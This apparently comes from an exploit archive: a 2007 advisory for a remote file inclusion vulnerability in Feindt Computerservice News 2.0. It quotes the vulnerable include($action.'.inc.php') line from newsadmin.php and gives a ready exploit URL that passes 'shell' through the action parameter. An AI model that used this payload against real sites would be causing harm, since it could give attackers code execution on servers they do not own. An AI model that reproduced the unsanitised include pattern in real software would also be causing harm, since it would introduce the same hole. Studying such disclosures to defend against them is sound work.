id: 1873
date: 05/13/2007
title: Feindt Computerservice News 2.0 (newsadmin.php action) RFI Vuln
author: Mogatil
cves: 

===============================================================
Feindt Computerservice News 2.0 (newsadmin.php action) RFI Vuln
===============================================================



####################### S==A==U==D==I #########################

News 2.0 (newsadmin.php) Remote File Include Vulnerabilities

##############################################################

Script Site :
http://www.tools4web.de/zaehler.php?i=5
##############################################################
File : /newsadmin.php

include($action.".inc.php");

##############################################################

Thanx: [cold zero] [gawey] [crazy man] [scorbion_22] [the_muslim_sniper]

##############################################################

Exploit :[Path]/newsadmin.php?action=shell

##############################################################



#  0day.today [2023-03-24]  #